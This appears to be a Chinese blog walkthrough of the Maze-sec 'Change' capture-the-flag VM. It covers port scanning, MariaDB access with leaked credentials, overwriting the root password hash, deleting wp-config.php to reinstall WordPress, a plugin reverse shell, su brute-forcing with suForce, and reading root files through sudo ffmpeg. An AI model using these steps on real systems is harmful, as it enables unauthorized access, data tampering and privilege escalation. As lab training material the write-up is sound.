Change

靶机说明

QQ群:660930334

一、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/miao/maze-sec/change]
└─# nmap -sn 192.168.2.0/24               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-21 10:29 CST
Nmap scan report for 192.168.2.1
Host is up (0.00060s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00040s latency).
MAC Address: 08:00:27:B5:D3:0B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.60
Host is up (0.00077s latency).
MAC Address: 08:00:27:7E:74:22 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.15 seconds

靶机IP:192.168.2.60

二、端口扫描

1、全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/miao/maze-sec/change]
└─# nmap --min-rate 10000 -p- 192.168.2.60                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-21 10:29 CST
Nmap scan report for 192.168.2.60
Host is up (0.00020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 08:00:27:7E:74:22 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds

开放端口:`22,80,3306

2、详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root㉿kali)-[/miao/maze-sec/change]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,3306 192.168.2.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-21 10:30 CST
Nmap scan report for 192.168.2.60
Host is up (0.00078s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
3306/tcp open  mysql   MySQL 5.5.5-10.5.23-MariaDB-0+deb11u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.5.23-MariaDB-0+deb11u1
|   Thread ID: 32
|   Capabilities flags: 63486
|   Some Capabilities: Speaks41ProtocolNew, Speaks41ProtocolOld, InteractiveClient, Support41Auth, SupportsLoadDataLocal, FoundRows, DontAllowDatabaseTableColumn, SupportsCompression, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, SupportsTransactions, ODBCClient, LongColumnFlag, ConnectWithDatabase, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: J"e[vcjk\i{OYRlJlb)A
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:7E:74:22 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds

3、UDP端口扫描

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[/miao/maze-sec/change]
└─# nmap -sU --top-ports 100 192.168.2.60                         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-21 10:31 CST
Nmap scan report for 192.168.2.60
Host is up (0.0017s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:7E:74:22 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 108.24 seconds

没有开放任何端口

三、WEB渗透

访问80端口,提示我们访问change.dsz,设置解析后访问,是一个登录框

查看页面源码,找到数据库的登录信息

四、MySQL数据库

连接数据库

1
2
3
4
┌──(root㉿kali)-[/miao/maze-sec/change]
└─# mysql -h 192.168.2.60 -P3306 -u change -p
Enter password: 
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

提示证书问题,直接跳过

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/miao/maze-sec/change]
└─# mysql -h 192.168.2.60 -P3306 -u change -p --skip-ssl         
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 45
Server version: 10.5.23-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

查看数据,发现存在root用户,加密方式为bcrypt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| changeweb          |
| information_schema |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use changeweb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [changeweb]> show tables;
+---------------------+
| Tables_in_changeweb |
+---------------------+
| users               |
+---------------------+
1 row in set (0.001 sec)

MariaDB [changeweb]> select * from uers;
ERROR 1146 (42S02): Table 'changeweb.uers' doesn't exist
MariaDB [changeweb]> select * from users;
+----+----------+--------------------------------------------------------------+
| id | username | password                                                     |
+----+----------+--------------------------------------------------------------+
|  1 | root     | $2y$10$EFCK8LdjkDv1W52q0bV8.OLUicO8h6kYBqU5nE1jOcSq3qQ9l5mZG |
+----+----------+--------------------------------------------------------------+
1 row in set (0.001 sec)

发现当前用户具有所有权限

1
2
3
4
5
6
7
8
MariaDB [changeweb]> SHOW GRANTS FOR CURRENT_USER;
+-------------------------------------------------------------------------------------------------------+
| Grants for change@%                                                                                   |
+-------------------------------------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO `change`@`%` IDENTIFIED BY PASSWORD '*526D926092550C5935871EE9117E7397F2715097' |
| GRANT ALL PRIVILEGES ON `changeweb`.* TO `change`@`%`                                                 |
+-------------------------------------------------------------------------------------------------------+
2 rows in set (0.002 sec)

尝试修改root用户的密码
https://bcrypt.online/

1
$2y$10$Af33bvt/ZJXZuBT/Q7l0Xu/GvoQkjPFTMTc.pEA7ipCZBBF0V9aaW //明文:123456
1
2
3
MariaDB [changeweb]> UPDATE users SET password = '$2y$10$Af33bvt/ZJXZuBT/Q7l0Xu/GvoQkjPFTMTc.pEA7ipCZBBF0V9aaW' where username = 'root';
Query OK, 1 row affected (0.020 sec)
Rows matched: 1  Changed: 1  Warnings: 0

五、获取SHELL

使用root:123456进行登录

发现只可以执行ls,rm,pwd命令,在/var/www/目录下面找到一个wordpress.change.dsz

添加解析后进行访问,发现是wordpress框架

WordPress利用

查看目录ls /var/www/wordpress.change.dsz/

根据给的命令,发现可以执行删除操作,那么就把wp-config.php删除,重新安装即可

1
rm /var/www/wordpress.change.dsz/wp-config.php

重新访问wordpress.change.dsz,需要重新进行安装

设置数据库

1
2
3
数据库名:changeweb
用户:change
密码:change

设置网站的用户名和密码即可进行登录

利用插件进行反弹shell

获取到SHELL

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[/tools/php]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.60] 41886
bash: cannot set terminal process group (466): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Change:/var/www/wordpress.change.dsz/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

USER FLAG

1
2
www-data@Change:/home/lzh$ cat user.txt 
flag{user-a05597ed1f36976e88c2e10a74902c52}

六、权限提升

1、提权至lzh

查看/home/lzh,发现存在密码文件.pass.txt,使用suForce进行爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@Change:/tmp$ ./suForce -ulzh -w /home/lzh/.pass.txt 
            _____                          
 ___ _   _ |  ___|__  _ __ ___ ___   
/ __| | | || |_ / _ \| '__/ __/ _ \ 
\__ \ |_| ||  _| (_) | | | (_|  __/  
|___/\__,_||_|  \___/|_|  \___\___|  
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | lzh
📖 Wordlist | /home/lzh/.pass.txt
🔎 Status   | 156/201/77%/1a2b3c4d1a2b3c4d
💥 Password | 1a2b3c4d1a2b3c4d
───────────────────────────────────
tput: No value for $TERM and no -T specified

使用密码1a2b3c4d1a2b3c4d,切换至lzh用户

1
2
3
4
www-data@Change:/tmp$ su - lzh
Password: 
lzh@Change:~$ id
uid=1000(lzh) gid=1000(lzh) groups=1000(lzh)

2、提权至root用户

检查sudo权限

1
2
3
4
5
6
7
lzh@Change:~$ sudo -l
Matching Defaults entries for lzh on Change:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lzh may run the following commands on Change:
    (ALL) NOPASSWD: /usr/bin/ffmpeg

发现lzh用户不用密码即可sudo运行/usr/bin/ffmpeg

ffmpeg提权

方法一:直接通过报错信息输出⽂件内容

sudo ffmpeg -f concat -i /root/root.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
lzh@Change:~$ sudo ffmpeg -f concat -i /root/root.txt
ffmpeg version 4.3.7-0+deb11u1 Copyright (c) 2000-2024 the FFmpeg developers
  built with gcc 10 (Debian 10.2.1-6)
  configuration: --prefix=/usr --extra-version=0+deb11u1 --toolchain=hardened --libdir=/usr/lib/x86_64-linux-gnu --incdir=/usr/include/x86_64-linux-gnu --arch=amd64 --enable-gpl --disable-stripping --enable-avresample --disable-filter=resample --enable-gnutls --enable-ladspa --enable-libaom --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libcodec2 --enable-libdav1d --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libgme --enable-libgsm --enable-libjack --enable-libmp3lame --enable-libmysofa --enable-libopenjpeg --enable-libopenmpt --enable-libopus --enable-libpulse --enable-librabbitmq --enable-librsvg --enable-librubberband --enable-libshine --enable-libsnappy --enable-libsoxr --enable-libspeex --enable-libsrt --enable-libssh --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libwebp --enable-libx265 --enable-libxml2 --enable-libxvid --enable-libzmq --enable-libzvbi --enable-lv2 --enable-omx --enable-openal --enable-opencl --enable-opengl --enable-sdl2 --enable-pocketsphinx --enable-libmfx --enable-libdc1394 --enable-libdrm --enable-libiec61883 --enable-chromaprint --enable-frei0r --enable-libx264 --enable-shared
  libavutil      56. 51.100 / 56. 51.100
  libavcodec     58. 91.100 / 58. 91.100
  libavformat    58. 45.100 / 58. 45.100
  libavdevice    58. 10.100 / 58. 10.100
  libavfilter     7. 85.100 /  7. 85.100
  libavresample   4.  0.  0 /  4.  0.  0
  libswscale      5.  7.100 /  5.  7.100
  libswresample   3.  7.100 /  3.  7.100
  libpostproc    55.  7.100 / 55.  7.100
[concat @ 0x559cd6343e40] Line 1: unknown keyword 'flag{root-8d4727897d0129417e1f3f91d1474c1c}'
/root/root.txt: Invalid data found when processing input
方法二:创建白色背景视频,将文本内容显示在视频中间
1
2
3
sudo ffmpeg -f lavfi -i color=c=white:s=640x480:d=5 -vf "drawtext=textfile
=/root/root.txt:x=(w-text_w)/2:y=(h-text_h)/2:fontsize=24:fontcolor=black"
-c:v libx264 -pix_fmt yuv420p output.mp4

ROOT FLAG

1
flag{root-8d4727897d0129417e1f3f91d1474c1c}
Maze-sec
#mysql #wordpress #sudo-ffmpeg
Change
http://miao-sec.github.io/Maze-sec/Change/
作者
Miao
发布于
2025年7月22日
许可协议
BY-MIAO